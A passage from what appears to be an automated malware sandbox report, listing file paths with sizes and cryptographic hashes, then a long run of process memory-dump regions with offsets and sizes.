                                                                                                                                                                        7a28096e69cf915cfddd7c21fff8381d152f63b932782ddb6d696a961b405e14ef64c4d203f18a8cd08fce770a0dc9b44bb9414de96f4e89c3b2f16017ec1b70

                                                                                                                                                                      • C:\Users\Admin\Desktop\InvokeSearch.xlt

                                                                                                                                                                        Filesize

                                                                                                                                                                        275KB

                                                                                                                                                                        MD5

                                                                                                                                                                        c27f313d78932568e18497f38a6093cd

                                                                                                                                                                        SHA1

                                                                                                                                                                        193d0474249e2728e35553fb3e6577f8d100139c

                                                                                                                                                                        SHA256

                                                                                                                                                                        25de01192574f91a99ccc018ced7af300ae4982cde568440ffc0793a0cc3b082

                                                                                                                                                                        SHA512

                                                                                                                                                                        413f149ce1d33073b46ca9bca30b7c5c160fdd3145dec45900f61c80abb687d7759205ab090aa6fc195582704cc003e5330153f5c9908ff1d87ab8cef2380bc4

                                                                                                                                                                      • C:\Users\Admin\Desktop\LockImport.xlsx

                                                                                                                                                                        Filesize

                                                                                                                                                                        201KB

                                                                                                                                                                        MD5

                                                                                                                                                                        b5184440ddab29954f1805ab1b6bc1c8

                                                                                                                                                                        SHA1

                                                                                                                                                                        9cc7ca3d96300244d7fe534559f38dca55d42ab8

                                                                                                                                                                        SHA256

                                                                                                                                                                        267bd0142eef414ec64c99c73da67b56a27b70ad617c948899840a2570aa2c48

                                                                                                                                                                        SHA512

                                                                                                                                                                        423b668c148c912f9fa4f87b72deefdc5d8c3c6b8c75d5f5a1f16b28bc5690c22941b9d4c05963466af436f8fc9541955c9f287e4bca03bd12570549bc9e8d26

                                                                                                                                                                      • C:\Users\Admin\Desktop\UnregisterUpdate.m1v

                                                                                                                                                                        Filesize

                                                                                                                                                                        286KB

                                                                                                                                                                        MD5

                                                                                                                                                                        7a8bcfe4813866926821b9091a1d2c29

                                                                                                                                                                        SHA1

                                                                                                                                                                        eb7427264c7a8abbc3279fb330e0ae08b5fc8b51

                                                                                                                                                                        SHA256

                                                                                                                                                                        2d58433744afb7d111018efee195edf7f5280ae842a0d3122fbddf897f6c7378

                                                                                                                                                                        SHA512

                                                                                                                                                                        1dd1593e8d01205c05e26fc144deec8df2c7f9d4a2b42c2e74f98187b5680a318fdac13e12c28cefaa5acc7ddac7141cedcdc6b5061648ca7a7d3a02b91e750f

                                                                                                                                                                      • C:\Users\Admin\Downloads\Unconfirmed 935461.crdownload

                                                                                                                                                                        Filesize

                                                                                                                                                                        60KB

                                                                                                                                                                        MD5

                                                                                                                                                                        2688c6bce37043422cb562caee46e099

                                                                                                                                                                        SHA1

                                                                                                                                                                        244b82f0f6b9c67a61c9cc9b5d22e783c5b7448a

                                                                                                                                                                        SHA256

                                                                                                                                                                        57ccd3f2aa50cbd454a8ab6494d80cb703e5070b27f9b8e56eaf519049382dee

                                                                                                                                                                        SHA512

                                                                                                                                                                        079bf61ad3bc8458d3f7b323b0383d3a7eec237c8cc5e38e8fd9310f816dfc7db7873350a1afb4ce0d9e51ea0d847422c0ea5e19ccdde92d24d3055367561799

                                                                                                                                                                      • C:\Windows\Logs\DISM\dism.log

                                                                                                                                                                        Filesize

                                                                                                                                                                        2.3MB

                                                                                                                                                                        MD5

                                                                                                                                                                        ed6623bd365d897ea572fb68c7cca9db

                                                                                                                                                                        SHA1

                                                                                                                                                                        03ef0cbc3c742d17add99aa94c541a58ae42ac7a

                                                                                                                                                                        SHA256

                                                                                                                                                                        718ed8be883f70c2525305dc3ac05436f4ce5ed6560c3f65a2ba9006496f8ca7

                                                                                                                                                                        SHA512

                                                                                                                                                                        8891d352fc7ff33f5fc2602b9ffc19c3ca9b5c28efbe49ab231c1597c1351e90be519cee64ca289e8b204aee475ad37755236612f693839e1c7c9dc372cb293c

                                                                                                                                                                      • C:\Windows\Logs\DISM\dism.log

                                                                                                                                                                        Filesize

                                                                                                                                                                        2.3MB

                                                                                                                                                                        MD5

                                                                                                                                                                        187d83c9faf0e2a5fe45cfdf0d4540ef

                                                                                                                                                                        SHA1

                                                                                                                                                                        9ae8d76b832e8e921f522100e86f97faa5946ea3

                                                                                                                                                                        SHA256

                                                                                                                                                                        3b1d1bcecfc984f2616d8ad31279f88d41bf8094617f640f65f99477870d0733

                                                                                                                                                                        SHA512

                                                                                                                                                                        ea61d4f3b6872a3632fce4b8ab1236412e3018f79406fb1ed05e85bde00f95f0211cd2706673489a73aa3ea3688c95b09c9e62eb15c513b9e6216ba102ef771f

                                                                                                                                                                      • C:\Windows\Panther\UnattendGC\diagerr.xml

                                                                                                                                                                        Filesize

                                                                                                                                                                        9KB

                                                                                                                                                                        MD5

                                                                                                                                                                        4f157b5055b21ae34028756156c332f4

                                                                                                                                                                        SHA1

                                                                                                                                                                        d9c1427ea79fcfb6187b32f206ff796c539e6f67

                                                                                                                                                                        SHA256

                                                                                                                                                                        35d66d80352ea77ddab275e0656bb5870bed7b7d60db2e6dc6d7626f63eceb7d

                                                                                                                                                                        SHA512

                                                                                                                                                                        5afd347c51f1176b9d2b7e98d2748e14a1c52751c1734e5b2c753a45c9b1e0f032aa0f4277cdb02712e29cf47b4d01a95d3677e854d936391f82ea13c362d71b

                                                                                                                                                                      • C:\Windows\Panther\UnattendGC\diagwrn.xml

                                                                                                                                                                        Filesize

                                                                                                                                                                        10KB

                                                                                                                                                                        MD5

                                                                                                                                                                        4a0ae43efbace583b192dc81f9edd6f0

                                                                                                                                                                        SHA1

                                                                                                                                                                        af7dcf729914c64795931937a00e7974f41545fa

                                                                                                                                                                        SHA256

                                                                                                                                                                        8d052d91187354e365340238bf22879375d9de9f73be33b8230937c4dfb53a64

                                                                                                                                                                        SHA512

                                                                                                                                                                        5295b626e761d7db5d0891748be814b14d13d87fff3d519765c46223b297b44b868e5967186ad7bec508c6b9aea467bdf6e98a8bbf50797d4f5db1cd2a96f6df

                                                                                                                                                                      • memory/2616-223-0x0000000000EB0000-0x0000000000EC6000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        88KB

                                                                                                                                                                      • memory/2616-1375-0x00000000017B0000-0x00000000017BA000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        40KB

                                                                                                                                                                      • memory/2616-471-0x000000001C620000-0x000000001C740000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/2616-468-0x000000001ED00000-0x000000001F228000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        5.2MB

                                                                                                                                                                      • memory/2616-467-0x000000001CAC0000-0x000000001CACC000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        48KB

                                                                                                                                                                      • memory/2616-429-0x0000000001470000-0x000000000147E000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        56KB

                                                                                                                                                                      • memory/2616-1893-0x000000001BFE0000-0x000000001C090000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        704KB

                                                                                                                                                                      • memory/2616-616-0x000000001C750000-0x000000001C75C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        48KB

                                                                                                                                                                      • memory/3340-647-0x000001E49C650000-0x000001E49C651000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3340-648-0x000001E49C650000-0x000001E49C651000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3340-652-0x000001E49C650000-0x000001E49C651000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3340-646-0x000001E49C650000-0x000001E49C651000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3340-655-0x000001E49C650000-0x000001E49C651000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3340-656-0x000001E49C650000-0x000001E49C651000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3340-654-0x000001E49C650000-0x000001E49C651000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3340-653-0x000001E49C650000-0x000001E49C651000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3340-651-0x000001E49C650000-0x000001E49C651000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3364-459-0x0000018C03540000-0x0000018C03541000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3364-451-0x0000018C03540000-0x0000018C03541000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3364-457-0x0000018C03540000-0x0000018C03541000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3364-460-0x0000018C03540000-0x0000018C03541000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3364-461-0x0000018C03540000-0x0000018C03541000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3364-462-0x0000018C03540000-0x0000018C03541000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3364-463-0x0000018C03540000-0x0000018C03541000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3364-458-0x0000018C03540000-0x0000018C03541000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3364-452-0x0000018C03540000-0x0000018C03541000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3364-453-0x0000018C03540000-0x0000018C03541000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3516-876-0x000002996FE80000-0x000002996FF80000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        1024KB

                                                                                                                                                                      • memory/3516-884-0x000002996FF80000-0x0000029970080000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        1024KB

                                                                                                                                                                      • memory/3516-758-0x000002996EFC0000-0x000002996EFE0000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        128KB

                                                                                                                                                                      • memory/3516-729-0x000002995E8D0000-0x000002995E8F0000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        128KB

                                                                                                                                                                      • memory/4384-1328-0x0000000006A30000-0x0000000006A40000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/4384-1342-0x00000000065D0000-0x00000000065E0000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/4384-1351-0x0000000006A30000-0x0000000006A40000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/4384-1355-0x0000000006A30000-0x0000000006A40000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/4384-1353-0x0000000006A30000-0x0000000006A40000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/4384-1354-0x0000000006A30000-0x0000000006A40000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/4384-1352-0x0000000006A30000-0x0000000006A40000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/4384-1356-0x0000000009430000-0x0000000009440000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/4384-1357-0x00000000065D0000-0x00000000065E0000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/4384-1339-0x00000000065D0000-0x00000000065E0000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/4384-1341-0x0000000006A30000-0x0000000006A40000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/4384-1340-0x0000000006A30000-0x0000000006A40000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/4384-1338-0x00000000065D0000-0x00000000065E0000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/4384-1337-0x0000000009430000-0x0000000009440000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/4384-1329-0x0000000006A30000-0x0000000006A40000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/4384-1330-0x0000000006A30000-0x0000000006A40000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/4384-1331-0x0000000006A30000-0x0000000006A40000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/5260-229-0x00000224A0E00000-0x00000224A0E22000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        136KB

                                                                                                                                                                      • memory/5484-1236-0x0000014CE9E40000-0x0000014CEA902000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        10.8MB

                                                                                                                                                                      • memory/5484-662-0x0000014CE9E40000-0x0000014CEA902000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        10.8MB

                                                                                                                                                                      • memory/5484-642-0x0000014CEB1A0000-0x0000014CEB1E4000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        272KB

                                                                                                                                                                      • memory/5484-643-0x0000014CEB270000-0x0000014CEB2E6000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        472KB

                                                                                                                                                                      • memory/5484-658-0x0000014CE9E40000-0x0000014CEA902000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        10.8MB

                                                                                                                                                                      • memory/5484-660-0x0000014CE9E40000-0x0000014CEA902000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        10.8MB

                                                                                                                                                                      • memory/5484-663-0x0000014CE9E40000-0x0000014CEA902000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        10.8MB

                                                                                                                                                                      • memory/5484-666-0x0000014CE9E40000-0x0000014CEA902000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        10.8MB

                                                                                                                                                                      • memory/5484-668-0x0000014CE9E40000-0x0000014CEA902000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        10.8MB

                                                                                                                                                                      • memory/5484-670-0x0000014CE9E40000-0x0000014CEA902000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        10.8MB

                                                                                                                                                                      • memory/5484-671-0x0000014CE9E40000-0x0000014CEA902000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        10.8MB

                                                                                                                                                                      • memory/6716-1304-0x0000000007100000-0x0000000007110000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/6716-1295-0x0000000007450000-0x0000000007460000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/6716-1298-0x0000000007450000-0x0000000007460000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/6716-1297-0x0000000007450000-0x0000000007460000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/6716-1296-0x0000000007450000-0x0000000007460000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/6716-1302-0x0000000007450000-0x0000000007460000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/6716-1299-0x000000000A0A0000-0x000000000A0B0000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/6716-1300-0x0000000007100000-0x0000000007110000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/6716-1301-0x0000000007100000-0x0000000007110000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/6716-1303-0x0000000007450000-0x0000000007460000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/6716-1316-0x0000000007450000-0x0000000007460000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB